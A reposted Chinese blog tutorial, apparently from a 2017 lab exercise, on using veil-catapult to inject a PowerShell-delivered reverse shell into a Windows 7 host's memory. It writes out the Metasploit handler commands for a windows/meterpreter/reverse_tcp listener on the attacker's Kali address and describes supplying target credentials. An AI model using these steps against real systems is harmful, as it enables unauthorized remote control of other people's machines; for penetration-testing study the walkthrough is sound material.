码迷,mamicode.com
首页 > 其他好文 > 详细

veil-catapult

时间:2017-04-24 18:17:36      阅读:256      评论:0      收藏:0      [点我收藏+]

标签:建立连接   windows   通知   保存   alt   目标   步骤   设置   ges   

 veil-catapult进行payload投放,直接使payload在内存中执行。

powershell工作原理:从kali先发一个powershell脚本到目标主机上,再发一个反弹shell到目标主机,再发一个指令给powershell,powershell通知反弹shell连接kali,之后就建立连接了

缺点:兼容性较差

kaliIP:192.168.1.119

目标IP:192.168.1.121

veil-catapult

技术分享

通常选1、2,如果使用标准的payload就选1,已经想使用自己的payload就选2。

这里选1

 

先生成powershell

技术分享

选1

在win7上是有powershell的运行环境的,直接在运行输入powershell

技术分享

技术分享

设置IP,目标用户名密码,执行形式

技术分享

回车

 

生成反弹shell的payload

技术分享

选1

设置反弹的IP,端口

技术分享

然后就生成好了,生成的payload并没有保存到本地,而是存在内存中,回车注入到目标主机的内存中,使目标主机反弹连接到kali

技术分享

但是kali并没有打开侦听,所以并没有连接成功,所以我们先打开msf的侦听

use exploit/multi/handler

技术分享

set payload windows/meterpreter/reverse_tcp

技术分享

 设置反弹的IP,和端口,以线程的注入方式

set lport 4444

set lhost 192.168.1.119

set EXITFUNC thread

技术分享

技术分享

show options

技术分享

exploit执行侦听

技术分享

msf执行侦听后,再对目标按照以上步骤进行payload投放

 

veil-catapult

标签:建立连接   windows   通知   保存   alt   目标   步骤   设置   ges   

原文地址:http://www.cnblogs.com/zylq-blog/p/6758165.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!